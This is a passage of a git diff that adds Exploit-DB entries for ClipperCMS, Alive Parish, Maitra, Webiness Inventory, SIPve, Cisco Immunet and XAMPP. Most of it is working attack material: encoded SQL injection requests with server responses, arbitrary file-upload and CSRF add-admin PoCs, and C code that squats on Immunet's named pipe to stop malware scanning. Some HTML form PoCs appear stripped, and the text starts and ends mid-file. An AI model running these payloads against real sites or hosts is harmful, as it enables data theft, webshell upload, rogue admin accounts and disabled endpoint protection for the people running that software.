Version: 1.3.3 +# Tested on: Windows 10 x64 (XAMPP, Firefox) +# CVE : CVE-2018-19135 + +* Description: + +ClipperCMS 1.3.3 does not have CSRF protection on its kcfinder file upload +which is being used by default. This can be used by an attacker to perform +actions for an admin (or any user with file upload capability). With this +vulnerability, it can automatically upload file/s (by default it allows +aac,au,avi,css,cache,doc,docx,gz,gzip,htm,html,js,mp3,mp4,mpeg,mpg,ods,odp,odt,pdf,ppt,pptx,rar,tar,tgz,txt,wav,wmv,xls,xlsx,xml,z,zip +as file types). Note that web shell that can be used for remote code +execution can be achieved depending on the file types being accepted. +Uploaded file can be accessed publicly on the "/assets/files" directory +(e.g. uploaded a malicious html file with filename: poc.html file => +http:///clipper/assets/files/poc.html). +This can lead for the website to be host unintended file/s. + +*Steps to reproduce: + +Admin (or user with file upload capability) logged in ClipperCMS 1.3.3 -> +browse/open a controlled website (e.g. by link or open PoC below in a +browser where admin/user logged in to ClipperCMS 1.3.3) with the poc below +-> file is uploaded and can be accessed on http:// +/clipper/assets/files/poc.html + +*Proof of Concept: + +PoC below will automatically upload a "poc.html" file with simple XSS +payload. Steps above are how to make use of the PoC. + + + + + + + + +*Proof of Concept Demo: + +Actual video demo of the vulnerability being exploited is available on: +https://youtu.be/bEYqb99MdYs + +*Reference: + +https://github.com/ClipperCMS/ClipperCMS/issues/494 \ No newline at end of file diff --git a/exploits/php/webapps/45840.txt b/exploits/php/webapps/45840.txt new file mode 100644 index 000000000..059d9dd9f --- /dev/null +++ b/exploits/php/webapps/45840.txt @@ -0,0 +1,48 @@ +# Exploit Title: Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload +# Dork: N/A +# Date: 2018-11-11 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://demo.aliveparish.com +# Software Link: https://netcologne.dl.sourceforge.net/project/aliveparish/aliveparish-v2.0.zip +# Version: 2.0.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/parish/search?key=[SQL] +# +GET /[PATH]/parish/search?key=%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=d98c14a2b1f274925e7993331153a20d +Connection: keep-alive +HTTP/2.0 500 Internal Server Error +Server: nginx +Date: Sun, 11 Nov 2018 09:18:22 GMT +Content-Type: text/html; charset=UTF-8 +x-powered-by: PHP/7.1.16 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +X-Firefox-Spdy: h2 + +# POC: +# 2) +# http://localhost/[PATH]/person/photo/1 +# +# http://localhost/[PATH]/images/uploaded/[FILE] +# + + +
+ + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45841.txt b/exploits/php/webapps/45841.txt new file mode 100644 index 000000000..1a0ab8cd4 --- /dev/null +++ b/exploits/php/webapps/45841.txt @@ -0,0 +1,70 @@ +# Exploit Title: Maitra - Mail Tracking System 1.7.2 - SQL Injection / Database File Download +# Dork: N/A +# Date: 2018-11-11 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://salzertechnologies.com/ +# Software Link: https://netcologne.dl.sourceforge.net/project/maitra/maitra/maitra-desktop-v1.7.2.zip +# Version: 1.7.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# Server : Mongoose web server v.5.6 [FREE EDITION] +# Default listening_port: 8080,8081,8082 + +# POC: +# 1) +# http://localhost/[PATH]/application/db/maitra.sqlite +# +GET /[PATH]/application/db/maitra.sqlite HTTP/1.1 +Host: TARGET:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 11 Nov 2018 11:04:24 GMT +Last-Modified: Sun, 11 Nov 2018 10:46:47 GMT +Etag: "5be80897.1114112" +Content-Type: text/plain +Content-Length: 1114112 +Connection: keep-alive +Accept-Ranges: bytes + +# POC: +# 2) +# http://localhost/[PATH]/?c=outmail&m=outmailentry&mailid=[SQL] +# +GET /[PATH]/?c=outmail&m=outmailentry&mailid=-1)%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2csqlite_version()%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2d%2d HTTP/1.1 +Host: TARGET:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221537f5ec92a5c39fef327d355b49a9d4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541933047%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D4dc0c3b97103da70527fd4cb032a2a78165b670b +Connection: keep-alive +HTTP/1.1 200 OK +X-Powered-By: PHP/5.5.10 +Set-Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221537f5ec92a5c39fef327d355b49a9d4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541933047%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D4dc0c3b97103da70527fd4cb032a2a78165b670b; expires=Sun, 11-Nov-2018 12:48:15 GMT; Max-Age=7200; path=/ +Content-Type: text/html +Transfer-Encoding: chunked + +# POC: +# 3) +# http://localhost/[PATH]/?c=inmail&m=inmailentry&mailid=[SQL] +# +GET /[PATH]/?c=inmail&m=inmailentry&mailid=%2d%31%29%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%73%71%6c%69%74%65%5f%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2d%2d HTTP/1.1 +Host: TARGET:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229bc792cd7f3df106dfaa30c4f9838dfb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541931921%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D23567922d51348e5db91632764ff616f7d5670ad +Connection: keep-alive +HTTP/1.1 200 OK +X-Powered-By: PHP/5.5.10 +Set-Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221537f5ec92a5c39fef327d355b49a9d4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541933047%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D4dc0c3b97103da70527fd4cb032a2a78165b670b; expires=Sun, 11-Nov-2018 12:44:07 GMT; Max-Age=7200; path=/ +Set-Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221537f5ec92a5c39fef327d355b49a9d4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541933047%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D4dc0c3b97103da70527fd4cb032a2a78165b670b; expires=Sun, 11-Nov-2018 12:44:07 GMT; Max-Age=7200; path=/ +Content-Type: text/html +Transfer-Encoding: chunked \ No newline at end of file diff --git a/exploits/php/webapps/45842.txt b/exploits/php/webapps/45842.txt new file mode 100644 index 000000000..fe8f2a46e --- /dev/null +++ b/exploits/php/webapps/45842.txt @@ -0,0 +1,146 @@ +# Exploit Title: Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery Add Admin) +# Dork: N/A +# Date: 2018-11-11 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://github.com/webiness/webiness_inventory +# Software Link: https://kent.dl.sourceforge.net/project/webinessinventory/2.3/webiness_inventory-2.3.zip +# Version: 2.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/protected/library/ajax/WsSaveToModel.php +# +# http://localhost/[PATH]/runtime/PartnerModel/[FILE] +# +POST /[PATH]/protected/library/ajax/WsSaveToModel.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------19855571512095910543502690828 +Content-Length: 384 +-----------------------------19855571512095910543502690828 +Content-Disposition: form-data; name="model_name" +PartnerModel +-----------------------------19855571512095910543502690828 +Content-Disposition: form-data; name="logo"; filename="phpinfo.php" +Content-Type: application/force-download + +-----------------------------19855571512095910543502690828-- +HTTP/1.1 200 OK +Date: Sun, 11 Nov 2018 16:57:15 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# +GET /[PATH]/runtime/PartnerModel/phpinfo.php HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 11 Nov 2018 16:58:27 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/protected/library/ajax/WsSaveToModel.php +# +# http://localhost/[PATH]/runtime/PartnerModel/[FILE] +# + + +
+ + + +
+ + + +# POC: +# 3) +# http://localhost/[PATH]/protected/library/ajax/WsSaveToModel.php +# + + +
+ + + + + + + verified account? + active account? + +
+ + + +# +POST /[PATH]/protected/library/ajax/WsSaveToModel.php HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------712753139516771986337452300 +Content-Length: 989 +-----------------------------712753139516771986337452300 +Content-Disposition: form-data; name="model_name" +Ws_userModel +-----------------------------712753139516771986337452300 +Content-Disposition: form-data; name="id" +66 +-----------------------------712753139516771986337452300 +Content-Disposition: form-data; name="email" +efe@omerefe.com +-----------------------------712753139516771986337452300 +Content-Disposition: form-data; name="password" +efe +-----------------------------712753139516771986337452300 +Content-Disposition: form-data; name="user_salt" +-----------------------------712753139516771986337452300 +Content-Disposition: form-data; name="is_verified" +1 +-----------------------------712753139516771986337452300 +Content-Disposition: form-data; name="is_active" +1 +-----------------------------712753139516771986337452300 +Content-Disposition: form-data; name="verification_code" +-----------------------------712753139516771986337452300-- +HTTP/1.1 200 OK +Date: Sun, 11 Nov 2018 17:19:11 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +/* `exploitdb`.`ws_user` */ +$ws_user = array( + array('id' => '66','email' => 'efe@omerefe.com','password' => 'f91f01637f051f2d44d6ee847e4bd339e7f89aab11ace6ab30c6c0af9d0f91fdcf90deb1e01a26320fe551c778c26ed57501f8cab4a026d3eaffbacdd3838794','user_salt' => '29tevoxs9n8lygh1w4xagv4j0w5w4q4ti3nokzsm0655zjl2ci','is_verified' => '1','is_active' => '1','verification_code' => '') +); \ No newline at end of file diff --git a/exploits/php/webapps/45843.txt b/exploits/php/webapps/45843.txt new file mode 100644 index 000000000..3f48fd2ce --- /dev/null +++ b/exploits/php/webapps/45843.txt @@ -0,0 +1,32 @@ +# Exploit Title: Webiness Inventory 2.3 - SQL Injection +# Dork: N/A +# Date: 2018-11-11 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://github.com/webiness/webiness_inventory +# Software Link: https://kent.dl.sourceforge.net/project/webinessinventory/2.3/webiness_inventory-2.3.zip +# Version: 2.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/protected/library/ajax/WsModelGrid.php +# +POST /[PATH]/protected/library/ajax/WsModelGrid.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 541 +model=PartnerModel&order=%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%32%3d%32%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 +HTTP/1.1 500 Internal Server Error +Date: Sun, 11 Nov 2018 16:16:54 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 315 +Connection: close +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45844.txt b/exploits/php/webapps/45844.txt new file mode 100644 index 000000000..51a624717 --- /dev/null +++ b/exploits/php/webapps/45844.txt @@ -0,0 +1,81 @@ +# Exploit Title: SIPve 0.0.2-R19 - SQL Injection +# Dork: N/A +# Date: 2018-11-11 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://sourceforge.net/projects/sipve/ +# Software Link: https://datapacket.dl.sourceforge.net/project/sipve/sipve-v0.0.2-R19.tar.gz +# Version: 0.0.2-R19 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/monitorasoc/view/monitorasocAcc.php?usuario=[SQL]&accion=asociar +# +GET /[PATH]/monitorasoc/view/monitorasocAcc.php?usuario=%31%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%45%66%65%29%2d%2d%20%45%66%65&accion=asociar HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=p5kifla1c6ge33dkui0eijm2e2 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 11 Nov 2018 18:56:49 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Sat, 26 Jul 1997 05:00:00 GMT +Cache-Control: no-cache, must-revalidate +Pragma: no-cache +Keep-Alive: timeout=5, max=94 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/grupo/view/getGrupoFuncionLoaded.php?idgrupo=[SQL]&accion=1 +# +GET /[PATH]/grupo/view/getGrupoFuncionLoaded.php?idgrupo=%31%27%29%20%52%4c%49%4b%45%20%28%53%45%4c%45%43%54%20%28%43%41%53%45%20%57%48%45%4e%20%28%36%36%3d%36%36%29%20%54%48%45%4e%20%31%20%45%4c%53%45%20%30%78%32%38%20%45%4e%44%29%29%2d%2d%20%45%66%65&accion=1 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=p5kifla1c6ge33dkui0eijm2e2 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 11 Nov 2018 18:58:53 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Cache-Control: no-cache, must-revalidate +Expires: Sat, 26 Jul 1997 05:00:00 GMT +Keep-Alive: timeout=5, max=91 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/monitorremoto/view/setStatusEvento.php?idevento=[SQL] +# +GET /[PATH]/monitorremoto/view/setStatusEvento.php?idevento=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=p5kifla1c6ge33dkui0eijm2e2 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 11 Nov 2018 19:01:04 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/windows/dos/45829.c b/exploits/windows/dos/45829.c new file mode 100644 index 000000000..84cbaf244 --- /dev/null +++ b/exploits/windows/dos/45829.c @@ -0,0 +1,189 @@ +/* +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/CISCO-IMMUNET-AND-CISCO-AMP-FOR-ENDPOINTS-SYSTEM-SCAN-DENIAL-OF-SERVICE.txt +[+] ISR: ApparitionSec + + +***Greetz: indoushka | Eduardo B.*** + + +[Vendor] +www.cisco.com + + +[Multiple Products] +Cisco Immunet < v6.2.0 and Cisco AMP For Endpoints v6.2.0 + + +Cisco Immunet is a free, cloud-based, community-driven antivirus application, using the ClamAV and its own engine. +The software is complementary with existing antivirus software. + +Cisco AMP (Advanced Malware Protection) +Advanced Malware Protection (AMP) goes beyond point-in-time capabilities and is built to protect organizations before, during, and after an attack. + + +[Vulnerability Type] +System Scan Denial of Service + + +[CVE Reference] +CVE-2018-15437 + +Cisco Advisory ID: cisco-sa-20181107-imm-dos +Cisco Bug ID: CSCvk70945 +Cisco Bug ID: CSCvn05551 + + +CVSS Score: +Base 5.5 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:X/RL:X/RC:X + + +[Security Issue] +A vulnerability in the system scanning component of Cisco Immunet and Cisco Advanced Malware Protection (AMP) for Endpoints running on +Microsoft Windows could allow a local attacker to disable the scanning functionality of the product. + +This could allow executable files to be launched on the system without being analyzed for threats. +The vulnerability is due to improper process resource handling. + +An attacker could exploit this vulnerability by gaining local access to a system running Microsoft Windows and protected by Cisco Immunet or +Cisco AMP for Endpoints and executing a malicious file. + +A successful exploit could allow the attacker to prevent the scanning services from functioning properly and ultimately prevent the system from +being protected from further intrusion. + +There are no workarounds that address this vulnerability. + +Issue is due to a NULL DACL (RW Everyone) resulting in a system scan Denial Of Service vulnerability for both of these endpoint protection programs. + +The affected end user will get pop up warning box when attempting to perform a file or system scan, + +"You Can Not Scan at This Time + +"The Immunet service is not running. + +Please restart the service and retry." + +Below I provide details to exploit Cisco Immunet, however "Cisco AMP For Endpoints" is also affected so the exploit can easily be ported. + +[References] +https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181107-imm-dos + + +[Vulnerability Details] +Pipe is Remote Accessible PIPE_REJECT_REMOTE_CLIENTS not present. + +FILE_FLAG_FIRST_PIPE_INSTANCE not present. + +Max Pipe Instances = FF (255) + +loc_140028140: + +lea rax, [rbp+57h+pSecurityDescriptor] +mov [rbp+57h+SecurityAttributes.nLength], 18h +mov edx, 1 ; dwRevision +mov [rbp+57h+SecurityAttributes.lpSecurityDescriptor], rax +lea rcx, [rbp+57h+pSecurityDescriptor] ; pSecurityDescriptor +mov [rbp+57h+SecurityAttributes.bInheritHandle], 1 +call cs:InitializeSecurityDescriptor +xor r9d, r9d ; bDaclDefaulted +lea rcx, [rbp+57h+pSecurityDescriptor] ; pSecurityDescriptor +xor r8d, r8d ; pDacl +lea edx, [r9+1] ; bDaclPresent +call cs:SetSecurityDescriptorDacl +mov rcx, [rdi+18h] ; lpName +lea rax, [rbp+57h+SecurityAttributes] +mov [rsp+100h+lpSecurityAttributes], rax ; lpSecurityAttributes +mov edx, 40000003h ; dwOpenMode +mov [rsp+100h+nDefaultTimeOut], esi ; nDefaultTimeOut +mov r9d, 0FFh ; nMaxInstances +mov [rsp+100h+nInBufferSize], 2000h ; nInBufferSize +mov r8d, 6 ; dwPipeMode +mov [rsp+100h+nOutBufferSize], 2000h ; nOutBufferSize +call cs:CreateNamedPipeW +mov [rdi+8], rax +call cs:GetLastError +test eax, eax +jz short loc_140028203 + + + +[Exploit/POC] + +"Cisco-Immunet-Exploit.c" +*/ + +#include +#define pipename "\\\\.\\pipe\\IMMUNET_SCAN" + +/* Discovered by hyp3rlinx + CVE-2018-15437 */ + +int main(void) { + + while (TRUE){ + + HANDLE pipe = CreateNamedPipe(pipename, PIPE_ACCESS_INBOUND | PIPE_ACCESS_OUTBOUND , PIPE_WAIT, 1, 1024, 1024, 120 * 1000, NULL); + + if (pipe == INVALID_HANDLE_VALUE){ + + printf("Error: %d", GetLastError()); + + }else{ + + printf("%s","pipe created\n"); + + printf("%x",pipe); + + } + + ConnectNamedPipe(pipe, NULL); + + if(ImpersonateNamedPipeClient(pipe)){ + + printf("ok!"); + + }else{ + + printf("%s%d","WTF",GetLastError()); + + } + + CloseHandle(pipe); + + } + + return 0; + +} + +/* +[Network Access] +Local / Remote + + + +[Severity] +High + + + +Disclosure Timeline +============================= +Vendor Notification: August 7, 2018 +Vendor acknowledgement: August 7, 2018 +Vendor released fixes: November 7th, 2018 +November 8, 2018 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx +*/ \ No newline at end of file diff --git a/exploits/windows/local/45828.py b/exploits/windows/local/45828.py new file mode 100755 index 000000000..95cb38e16 --- /dev/null +++ b/exploits/windows/local/45828.py @@ -0,0 +1,76 @@ +# Exploit Title: XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode) +# Exploit Author: Gionathan "John" Reale (0-day DoS exploit), Semen Alexandrovich Lyhin (1-day fully working exploit). +# Shellcode Author: Giuseppe D'Amore (EDB:28996) +# Date: 2018-11-08. +# Software: XAMPP +# Version: 3.2.2 / 7.2.9 (Newest version at time of writing) +# Download: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/7.2.9/xampp-portable-win32-7.2.9-0-VC15-installer.exe/download +# Tested on: Windows 10 64bit with XAMPP 32bit. Should work on any Windows since XP. + +# Special thanks to Deloitte Ukraine for providing a few payed hours to create this exploit. + +# Steps to Reproduce: +# Run the python exploit script, it will create a new file with the name "exploit.txt". +# Copy the contents of "exploit.txt" +# Start the program and click "Config (Top Right With Symbol)" +# Paste the contents of 